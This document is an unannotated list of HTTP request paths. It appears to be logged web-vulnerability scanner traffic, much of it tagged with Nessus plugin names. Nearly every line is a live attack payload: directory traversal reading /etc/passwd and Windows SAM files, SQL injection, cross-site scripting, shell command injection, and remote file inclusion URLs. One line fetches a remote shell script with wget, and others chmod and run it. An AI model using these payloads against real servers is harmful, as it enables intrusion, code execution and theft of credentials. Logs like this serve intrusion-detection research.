/d5a5renl.cgi? /examples/jsp/colors/awstatstotals.php?sort="].phpinfo().exit().$a[" /manager/index.php?module= /ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /lmw4r201.nsf? /hipkz026.exe? /hrttz9fj.php? /xfkun1ku.x? /6n7aacgg.do? /bmeun223.cfc? /javascript/typo3.exe /d5a5renl.do? /scripts/d3z7yywpyeoa.php /examples/jsp/error/search.php?searchstring= /lmw4r201.pl? /scripts/onwkbtts3uj1.cgi /en-us/account/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /bin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /javascript/not.exe /scripts/shopsearch.asp?search=yes /main.php?stuff=ping;-w;8000;-n;1;1.2.3.4|rem; /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/tduwadykcu.sh+>+/dev/null+&')."]=1 /examples/jsp/cal/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /tuwjta1w.idc? /c32web.exe/getimage?imagename=cart32.ini\x00.gif /lite tracker script/ /l13b77e5.idc? /help.php?q="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /scripts/shop/orders/orders.txt /main.php?logout="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09 /t578vqea.php3? /bin/r.cgi?file=../../../../../../../../../../etc/passwd /scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,947023198940,4,5,6,7,8,9,10,11-- /zroo33l4.x? /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/4dckqcc0acprbz?? /scripts/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /scriptresource.axd?d=junk /yver8r9o.x? /main.php?stuff=&ver;>q66756841&rem; /0rufe52p.mscgi? /examples/jsp/num/htgrep/file=index.html&hdr=/etc/passwd /help.php?q="ver >q65533214&rem /scs86g1p.jspa? /help.php?q=;uname >q88998669 # /pxagj7n7.exe? /scripts/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /script/ident/loginliste.php?path_inc=@rfiurl /jdx255ea.kspx? /en-us/app/xss /manager/index.php?mod_id=2&kb_ask= /mssql.exe /examples/jsp/num/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /examples/jsp/jsp2/el/viewpage.php?file=/etc/passwd /9o6g5vkn.do? /phpmyadmin/c32web.exe/getimage?imagename=cart32.ini\x00.gif /script/param/param.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /b4vng02k.html? /zmvq66jy.idc? /javascript/2003.exe /xfkun1ku.do? /u95h6ymu.jsp? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/rkejrxdjgj" /main.php?logout="|ping;-w;11000;-n;1;4.3.2.1|rem; /manager/ovlaunch.exe /help.php?q=ver;>q46895114&rem; /top.php?stuff="\x0drm q38313114 # /yver8r9o.pl? /javascript/htpasswd.tgz /readmore.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp? /ht8pn8uq.cfm? /en-us/i686v90l.php? /cgi-bin/docs.php?doc=../jpgraph-1.12.1/docs/index /examples/jsp/jsp2/el/?"> /examples/servlets/servlet/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /scripts/popup.php?include_path=/etc/passwd\x00 /en-us/accountsearch-results.dot?search_query=nessus">/ /7uz3ok60.cfm? /mailman/listinfo/ /raanw4ia.aspx? /en-us/esmozg5d.exe? /javascript/document.xls /modules.php?name=your_account&op=userinfo&username=bla /en-us/account/search.cgi?..\..\..\..\..\..\windows\win.ini /um7xpn15.php? /search/submit.php?config["sipssys"]=http://192.168.202.118:8080/tzhfyzkbomspvm? /0w155a7c.jspa? /javascript/mambo.exe /bin/cgi-test.exe /82q7ywa8.asp? /javascript/document.pfx /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /en-us/i686v90l.nsf? /email-subscription/ /3m5knyc4.cfm? /main.php?stuff=';uname\x09>q87217698\x09# /help.php?q="ping;-w;9000;-n;1;1.2.3.4&rem; /main.php?stuff=";uname # /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+rcx>>esbq /examples/jsp/cal/forum.php?do=viewtopic&cat=1&topic=1&page=1?cross_site_scripting.nasl /en-us/dda2qr7j.fts? /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'-- /dda2qr7j.cgi? /oie504mr.jsp? //q54599877&q3916"q3916<q3916>q54599877 /vac1l5vm.kspx? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+777+/tmp/tduwadykcu.sh')."]=1 /dda2qr7j.kspx? /scripts/nryr3lvrjnwx.asp /javascript/blogs.exe /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00 /en-us/n9xlumt5.nsf? /nmw0do67.do? /help.php?q="&ping,-w,9000,-n,1,4.3.2.1&rem, /scripts/patch/index.php /ywaxntrx.exe? /script/plugins/phpgacl/admin/index.php?path_inc=@rfiurl /o1zj4u9v.x? /top.php?stuff="\x0arm q36232773 # /technetwebcastwhatsnewinscriptingforwindows2003/ /j4rdyhw8.idc? /javascript/management.exe /phpmyadmin/scripts/setup.php /manager/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /en-us/jnv890lt.do? /javascript/.passwd.as /main.php?stuff='\x0adel q31711746 # /opensiteadmin/scripts/classes/databasemanager.php?path=@rfiurl\x00 /shell scripts/ /b4vng02k.php? /o1zj4u9v.aspx? /scripts/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /javascript/sslvpn.exe /82q7ywa8.dll? /phpmyadmin/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /examples/servlets/servlet/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /0u75ldxq.htm? /scripts/contacts/php?cal_dir=http://xxxxxxxx/ /_vti_bin/..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf..\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/dev.exe /cgi-bin/zpanel.php?page=/etc/passwd\x00 /javascript/.passwd.ws /7o5qp766.exe? /ewc3rz1l.aspx? /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/zz5thkvtmlgl? /javascript/asp.exe /cgi-home/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /tuwjta1w.jspa? /0w155a7c.kspx? /apavxugx.fts? /manager/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /cacti/hw3.cgi?daysonly=0).system('id').( /e9rx3ya4.jspa? /en-us/splunk_413_404error_xss.nasl-1331909104 /cgi-914/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /top.php?stuff=";uname >q25742723 # /cgi-915/msmmask.exe?mask=/junk334 /main.php?stuff=uname\x09>q84571882\x09# /en-us/account/includes/config.php?relative_script_path=http://xxxxxxx /scripts/piywzua5hwer.sh /nsn/..\webdemo/fdir.bas /en-us/i686v90l.htm? /examples/jsp/checkbox/pals-cgi?palsaction=restart&documentname=/etc/passwd /main.php?logout=";uname\x09>q28427886\x09# /main.php?stuff='uname\x09>q81291893\x09# /scripts/news.mdb /search.jsp?q=%" /examples/jsp/checkbox/admin/admin.php?sid=0' /archive.php?scriptpath=http://192.168.202.96:8080/ipb5ri?? /cgi-win/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /ewc3rz1l.cfc? /1qwv2p5p.cgi? /iv5vkgam.cgi? /fcgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd /n9xlumt5.idc? /javascript/tracker.exe /fcgi-bin/echo.exe?foo= /javascript/index.exe /phpmyadmin/ion-p.exe?page=../../../../../etc/passwd /javascript/jj.exe /top.php?stuff=";sleep\x0910\x09# /j734qobz.cgi? /0qhcnefz.php3? /gy23xnjq.cgi? /main.php?stuff=;del\x09q93759833\x09# /scripts/rwcgi60 /phpmyadmin/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /javascript/iisadmpwd.exe /j2kdmfw4.html? /contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /scripts/lrn28issfuqi.html /readmore.php?config[\"sipssys\"]=@rfiurl /main.php?logout="\x0dsleep 7 # /scripts/windmail.exe /main.php?stuff=&del;q66756841&rem; /script19/ /vignettescriptingnews/ /en-us/hipkz026.idc? /javascript/pages.exe /scripts/9pen4xzgztjn.cfm /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4c+cd+21+54+68+69+73+20+70+72+6f+67+72+61+6d+20+63+61+6e+6e+6f+74+20+62+65++>>esbq /bemarket/postscript/postscript.php?p_mode=http://cirt.net/rfiinc.txt? /search_result.asp?category=all&keyword=sql_error411885577602'&mode=date /oie504mr.kspx? /169okeyj.pl? /examples/jsp/jsp2/el/includes/db_adodb.php?basedir=/etc/passwd\x00 /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /cgi-bin/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /scripts/qop0sa1auif9.php /help.php?q="del,q69289112&rem, /cgi-bin/admin/configset.php?settings_dir=/etc/passwd\x00 /main.php?stuff=;uname\x09>q16377967\x09# /main.php?logout="\x0ddel\x09q32424996\x09# /mp's_surgery/ /33y9gcqq.jsp? /r3le3om5.aspx? /mod_membre/inscription.php?chemin=http://192.168.202.118:8080/2aibfaczmac8?? /examples/jsp/colors/mlog.html?screen=/etc/passwd /en-us/7o5qp766.kspx? /help.php?q="&rm\x09q66374774&rem\x09 /pyscript/ /fc9t54l7.jsp? /? /help.php?q="\x0auname >q34395972 # /main.php?logout="ping\xa0-w\xa011000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /opensiteadmin/scripts/classes/filters/singlefilter.php?path=@rfiurl\x00 /examples/jsp/jsp2/jspx/save.php?file_save=/etc/passwd /examples/jsp/num/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /examples/servlets/servlet/sendcard.php?view=1&id='sendcard_sql.nasl /javascript/htpasswd.sfish /scripts/irbf6nj7oyfh.html /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /cgi-bin/index.php?op=default&date=200607' union select 1,804459550,1,1,1,1,1,1,1,1--&blogid=1 /scripts/lce0cbkfb8xx.php3 /top.php?stuff="\x0duname\x09>q52865653\x09# /d44uk9h2.nsf? /cgi/gwweb.exe?help=bad-request /index.cfm?fuseaction=category.display&category_id=' /scripts/rih28haesl0j.pl /main.php?logout="&ver\xa0>q69712395&rem\xa0 /cgi-exe/texis.exe/junk /en-us/account/index.php?sensor_program= /help.php?q=';rm\x09q26484164\x09# /javascript/.passwd.bz2 /weq93ppb.php3? /javascript/android.exe /en-us/jnv890lt.exe? /manager/index.php?page=/etc/passwd\x00 /managesubscription/ /7u1pb2xi.mscgi? /main.php?logout="ping\x09-w\x099000\x09-n\x091\x091.2.3.4&rem\x09 /main.php?logout="del,q64292722&rem, /examples/jsp/checkbox/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /webcgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /examples/jsp/error/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg /examples/servlets/servlet/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /cgi-exe/sensepost.exe?/c+dir /top.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /w4996nr0.fts? /javascript/.htpasswd.sfish/\.\ /examples/jsp/num/pals-cgi?palsaction=restart&documentname=/etc/passwd /rv98iwjp.jspa? /examples/jsp/num/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd /help.php?q=\x0duname >q23688622 # /main.php?stuff="ping\x09-w\x097000\x09-n\x091\x094.3.2.1|rem\x09 /zln2hm2z.kspx? /aj3pf49c.asp? /h21y8w52.do? /help.php?q=|ping;-w;11000;-n;1;1.2.3.4|rem; /rv98iwjp.jsp? /scripts/nckowqpd4zng.pl /applescript/ /examples/jsp/jsp2/el/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /examples/jsp/colors/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /main.php?stuff="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /javascript/.passwd.7z /6wb70v0b.jspa? /scripts/browse.php /awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awseggic39wdud9texeq22uh8hvgaa/ptsrmtfadl.sh;echo|awstats457412.txt /examples/jsp/checkbox/ion-p.exe?page=../../../../../etc/passwd /scripts/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /examples/jsp/colors/index.php?op=default&date=200607' union select 1,450076443,1,1,1,1,1,1,1,1--&blogid=1 /javascript/tutorial.exe /scripts/phptonuke.php?filnavn=/etc/passwd /?ilang=eng&sid=2" /scripts/test-cgi.bat /x2gyorli.mscgi? /examples/jsp/error/shoutbox.php?conf=../../../../../../../../etc/passwd /xlj7h65o.asp? /main.php?stuff="&ver >q54323675&rem /top.php?stuff='&sleep\x097\x09# /6wb70v0b.exe? /gy23xnjq.htm? /cgi-bin/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir /main.php?stuff="ver >q73888727&rem /jnv890lt.mscgi? /javascript/document.pdf /en-us/account/shopaddtocart.asp?productid='42 /admin/index.php?path_to_script=@rfiurl?cmd=ls&path_to_script=@rfiurl? /manager/index.php?include_files[]=&include_files[query_string]=/etc/passwd /.fts /top.php?stuff=&ping;-w;11000;-n;1;1.2.3.4&rem; /examples/jsp/sessions/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /scripts/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /8t9v8k7x.exe? /en-us/esmozg5d.jsp? /en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\x00 /b5xdqgz2.mscgi? /script//ident/index.php?path_inc=http://cirt.net/rfiinc.txt? /phpmyadmin/activatemember?activatecode=&member="> /o1zj4u9v.php3? /main.php?stuff='\x0ddel q65565224 # /edzaia0i.pl? /javascript/poll.exe /t3af3tdz.nsf? /webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /um7xpn15.php? /winzip100.exe/ /scripts/qbch5ojumj32.pl /help.php?q="ping;-w;9000;-n;1;1.2.3.4|rem; /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=q81848235 //a="%3cscript%20src=%27http://www.example.com/test?rnd=q74158412%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /hipkz026.cfm? /7uz3ok60.cgi? /javascript/defaults.exe /man-cgi?section=0&topic=ls;id /ddoworrl.kspx? /en-us/.exe /top.php?stuff="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4&rem\x09 /examples/jsp/num/cart32.exe /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/llumt7msyau5y? /examples/jsp/sessions/sgdynamo.exe?htname=sgdynamo.exe /ny1b3qq4.mscgi? /examples/jsp/checkbox/pmwiki.php?globals[farmd]=/etc/passwd\x00 /javascript/press.exe /examples/jsp/num/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /fmnveedu.jsp? /? /examples/jsp/jsp2/el/server.pt?open=space&name=";} /manager/welcome.php?custom_welcome_page=/etc/passwd\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+72+61+72+79+41+77+73+32+5f+33+32+2e+64+6c+6c+00+5d+64+8b+1d+30+00+00+00+8b++>>ctdn /7o5qp766.php? /javascript/web-console.exe /webdav/c99.php?act=f&f=wce.exe&ft=exe&d=c:\ /inc/formmail.inc.php?script_root=http://192.168.202.118:8080/ghl9il? /scripts/rx9ysf2iwv4j.cgi /examples/servlets/servlet/dsweb/services/user-1"> /javascript/zip.exe /hjdzm96v.kspx? /webcgi/fileseek2.cgi?foot=;cat /etc/passwd&head= /ao22ww7y.cfc? /javascript/document.cs /bxnyrhmh.asp? /recordings/wordtrans.php?command=show_desc&advanced=1";id; true " /javascript/homepage.exe /help.php?q="ver,>q58627156&rem, /7uz3ok60.exe? /openbb/index.php?cid=' /scripts/index.php?cid=' /scripts/tomcat_proxy_directory_traversal.nasl1331905219 /phpmyadmin/search.jsp?q=%" /scripts/tradecli.dll /scripts/search /javascript/2005.exe /javascript/script.exe /odzk29aa.jsp? /javascript/people.exe /examples/jsp/error/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /hrttz9fj.idc? /examples/jsp/jsp2/el/admin/admin.php?sid=0' /vwmg565s.idc? /scripts/no-such-file.pl /en-us/account/base_qry_common.php?base_path=/etc/passwd\x00 /ewc3rz1l.jspa? /scripts/myphppagetool/doc/admin/index.php?ptinclude-http://xxxxxxxx /cgi-bin/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_t6vulpj4]));die;/* /esmozg5d.idc? /if69ddo1.kspx? /3hlysl2x.idc? /phpmyadmin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /scripts/rihzp7swr3p6.html /index.php?id='union/**/select/**/0,0,300412621,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/tinfo.php?id=1331919175 /s7qus4g3.asp? /national lampoon's christmas vaction/ /ju0u7kfo.mscgi? /mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /scripts/b0j2ijssh6cu.html /rubrique.asp?no=/../../../etc/passwd|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /esmozg5d.x? /..%5c..%5c..%5c..%5c..%5c../winnt/repair/sam._ /cgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /scripts/ggvfa_wichxq.sh /scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5 /scripts/fgos1sb1c1tr.cgi /javascript/view-source.exe /en-us/jnv890lt.idc? /aj3pf49c.dll? /examples/servlets/servlet/pals-cgi?palsaction=restart&documentname=/etc/passwd /phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd /en-us/h5sc3gxy.dll? /scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331904237,89676103 -- /x2gyorli.jspa? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/rrqfvzowbk0;')."]=1 /static//%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd /main.php?logout="|sleep 11 # /9o6g5vkn.nsf? /examples/jsp/colors/index.php?p='nessus /static//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /main.php?logout='&uname\x09>q79227952\x09# /cgi-bin/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /transcript/ /help.php?q="&ping\xa0-w\xa010000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /egaet53a.nsf? /7u1pb2xi.do? ///etc/passwd /help.php?q="\x0ddel q87848513 # /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../../../../../../../../../../..//boot.ini\x00 /cgi.cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /scripts/protection.php?action=logout&siteurl=/etc/passwd /en-us/jnv890lt.cgi? /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00 /javascript/typo3conf.exe /egaet53a.mscgi? /7o5qp766.dll? /webcgi/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /en-us/esmozg5d.jsp? /bn857frh.php3? /nyjgaorz.nsf? /en-us/account/index.php?show=../../../../../../../../../../../etc/passwd\x00 /manager/base_qry_common.php?base_path=/etc/passwd\x00 /recordings/cal_week.php?op=week&catview=999' /javascript/db.exe /javascript/stackdump.exe /osama bin laden video transcript afterdeath/ /base_local_rules.php?dir= /..%5c..%5c..%5c..%5c..%5c../winnt/repair/sam /if69ddo1.dll? /javascript/21.exe /rpxyx07v.kspx? /forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd /examples/jsp/checkbox/mapserv.exe?map=mapserver_detect.nasl.map /main.php?stuff=';rm q39366727 # /cgi-perl/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /gy23xnjq.aspx? /scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/moclyxlwqyfjnp?? /help.php?q=ver\x09>q75585226&rem\x09 /javascript/science.exe /htpasswd/ /? /top.php?stuff="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /main.php?stuff="ver\x0b>q47639929&rem\x0b /passwdqc/ /javascript/jar.exe /help.php?q='\x0arm\x09q12762848\x09# /lmw4r201.php? /p043snfr.nsf? /zln2hm2z.html? /javascript/gprs.exe /javascript/smile.exe /if69ddo1.pl? /phpmyadmin/index.php?search='>&searchmode=f /top.php?stuff="&ver\xa0>q97411474&rem\xa0 /c/winnt/system32/cmd.exe?/c+dir+/og /oie504mr.mscgi? /cacti/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /en-us/jnv890lt.htm? /main.php?stuff="rm q55141299 # /javascript/~chris.exe /en-us/33y9gcqq.exe? /help.php?q="ping -w 7000 -n 1 1.2.3.4&rem /javascript/groups.exe /cgi-binmultihtml.pl?multi=/etc/passwd\x00html /bn857frh.cgi? /javascript/promotion.exe /archive.php?scriptpath=http://192.168.202.96:8080/whmch8ftkt7kv?? /esmozg5d.aspx? /mpcgi/a1disp3.cgi?../../../../../../../../../../etc/passwd /q703m78q.pl? /help.php?q='sleep 11 # /news.php?scriptpath=http://192.168.202.118:8080/ghl9il?? /top.php?stuff="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c // /nyvbv05h.php3? /main.php?logout=&del;q53872587&rem; /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908880','5'-- /examples/jsp/num/index.php?include_files[]=&include_files[query_string]=/etc/passwd /cgi-bin/backend/classes.php?include_path=../lib/jinzora.js\x00 /examples/jsp/num/sendtemp.pl?templ=../../../../../etc/passwd /top.php?stuff="ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09 /hipscript/ /examples/jsp/colors?username=" /ygkjkngd.pl? /script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm?? /ion-p.exe?page=../../../../../etc/passwd /examples/jsp/colors/whois.cgi?action=load&whois=;id /cookie/?name=nessus&value=&age=288 /cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /manager/index.php?show=/etc/passwd /phpimageview.php?pic=javascript:alert(8754) /examples/jsp/checkbox/docs.php?doc=../jpgraph-1.12.1/docs/index /javascript/accounting.exe /0u75ldxq.aspx? /examples/jsp/num/includes/config.php?relative_script_path=http://xxxxxxx /top.php?stuff=;sleep\x0910\x09# /8t9v8k7x.do? /raanw4ia.pl? /main.php?stuff='&rm\x09q47285252\x09# /dslpwt15.idc? /ghswfouu.dll? /scripts/php-ping.php?host=test&submit=ping!&count=1|id|| /j2kdmfw4.pl? /en-us/esmozg5d.dll? /jackrabbit/search.jsp?q=%" /javascript/appslocallogin.exe /javascript/emu.exe /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/search/show.pl?url=file:/etc/passwd /cacti/a1disp3.cgi?/../../../../../../etc/passwd /bemarket/postscript/postscript.php?p_mode=@rfiurl /t578vqea.do? /ao22ww7y.jsp? /javascript/.passwd.jsp /en-us/manager/launcher/admin/directory?app_only=1&ns=xss /scriptztemplatez/ /help.php?q="&rm,q66241785&rem, /eei78ore.kspx? /help.php?q="&rm q49814877&rem /dda2qr7j.fts? /pxagj7n7.htm? /scripts/qg9h0c0svvat.php3 /vac1l5vm.exe? /jdx255ea.php3? /en-us/esmozg5d.x? //comment.php?mode=delete&sid=1&cid=<script>alert(document.cookie)</script> /main.php?logout="&ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /javascript/bb-histlog.exe /en-us/9kr0ih0v.aspx? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\x00 /cgi-sys/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /examples/jsp/jsp2/el/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /javascript/document.db /cgi-bin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /main.php?stuff='&uname # /typescript/ /scripts/?mode=debug /examples/jsp/colors/faq.php?action=&type=view&s=&id=-1' union select 0,1997959680,0,0,0,0,0-- /modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /scripts/1331904651-ror_session_fixation.nasl /pxagj7n7.asp? /hjdzm96v.exe? /main.php?stuff="uname\x09>q65882978\x09# /javascript/lost+found.exe /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/4dckqcc0acprbz? /player.exe/ /vjbrrppi.php? /javascript/utilities.exe /examples/servlets/servlet/include/theme.inc.php?fullpath=/etc/passwd\x00 /examples/jsp/sessions?username=" /gy23xnjq.nsf? /main.php?logout="del\x0bq22255946&rem\x0b /l752x1ry.nsf? /en-us/account/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /main.php?stuff="\x0auname\x09>q95586715\x09# /scripts/search.aspx /gvx7m5ti.idc? /javascript/document.old /help.php?q=&del;q75765892&rem; /yef5f3d5.asp? /transcript_may050127/ /javascript/hourly.exe /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/tzhfyzkbomspvm? /javascript/myadmin.exe /cgi-local/windmail.exe /20review.asp?productcode=' /mpcgi/fileseek2.cgi?foot=;cat /etc/passwd&head= /awin_subscriptions/ /mailman/admin/ml-name?\">; /vjbrrppi.exe? /scripts/index.php?p='nessus /help.php?q="&rm q16957345 # /o6ebbirj.cfm? /examples/jsp/error/item.fts?href=">; /? /if69ddo1.php3? /javascript/dl.exe /javascript/eu.exe /examples/jsp/num/phf?qalias=x\x0a/bin/cat /etc/passwd /ygkjkngd.nsf? /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/gjehhrjnrx0;echo|awstats679107.txt /main.php?frm_daynight=day&frm_passwd=q96852141&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width= /main.php?stuff="del;q74579968&rem; /bxnyrhmh.jsp? /e9rx3ya4.html? /scripts/lce0cbkfb8xx.html /cgi-bin/port.php?proto=tcp' /shopexd.asp?catalogid='42 /phpmyadmin/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /scripts/xtextarea.scr.php?globals[pth][spaw]=http://cirt.net/rfiinc.txt?? /examples/jsp/sessions/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /preview.php?php_script_path=http://inexistent_hacker_box/lib.php /hjdzm96v.htm? /examples/jsp/error/index.php?entry=' /examples/jsp/jsp2/el/cgiip.exe/wservice=wsbroker1/webutil/ping.p /scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?? /cgi-915/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /paypalxss/ /././././././../../../../../winnt/win.ini /examples/jsp/colors/include/sql.php?include_path=/etc/passwd\x00 /managersearch_results.dot?search_query=nessus">/ /examples/jsp/jsp2/jspx/item.fts?href=">; /examples/jsp/checkbox/search.jsp?q=%" /j4oqyvga.kspx? /v3axg1p8.php3? /main.php?stuff='\x0duname\x09>q12818567\x09# /interface/login/login_frame.php?site= /i7prbs22.do? /tuwjta1w.jsp? /top.php?stuff=' /vhzmaia2.jsp? /en-us/account/index.php?entry=' /chang'e_program/ /? /examples/jsp/cal/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_gzot_utg]));die;/* /phpslideshow.php?directory=x'><' /noscriptfailover/ /javascript/bz2.exe /scripts/fileseek2.cgi?foot=;cat /etc/passwd&head= /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/rzemxyjqrg.sh;echo|awstats990895.txt /javascript/services.exe /0w155a7c.html? /en-us/account/shopper.cgi?newpage=../../../../../../etc/passwd /b1q8bywu.kspx? /script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/tzhfyzkbomspvm? /manager/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1 /hjdzm96v.aspx? /zv8tv7h8.pl? /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 469168500-- /esmozg5d.do? /top.php?stuff="ver\x09>q19467518&rem\x09 /azcrfs8d.cgi? /webcgi/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /j4oqyvga.idc? /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1424302611-- /xamp_stop.exe /qczkquis.php3? 